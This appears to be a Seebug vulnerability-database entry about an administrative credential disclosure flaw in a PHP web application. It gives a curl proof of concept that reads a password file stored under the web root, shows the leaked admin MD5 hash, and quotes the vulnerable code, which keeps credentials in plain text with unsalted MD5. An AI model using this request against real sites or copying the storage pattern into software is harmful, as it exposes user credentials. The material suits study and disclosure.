[1] Administrative Credential Disclosure PoC: root@kali:/# curl http://localhost/home/caspers/public_html/demo/admin/userpwdadfasdfre.txt admin:3a4ebf16a4795ad258e5408bae7be341 # Vulnerable Code: [+] admin/common.php // Check user existance $pfile = fopen("userpwdadfasdfre.txt","a+"); rewind($pfile); while (!feof($pfile)) { $line = fgets($pfile); $tmp = explode(':', $line); if ($tmp[0] == $user) { $errorText = "The selected user name is taken!"; break; } } // If everything is OK -> store user data if ($errorText == ''){ // Secure password string $userpass = md5($pass1); fwrite($pfile, "\r\n$user:$userpass"); } fclose($pfile);
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论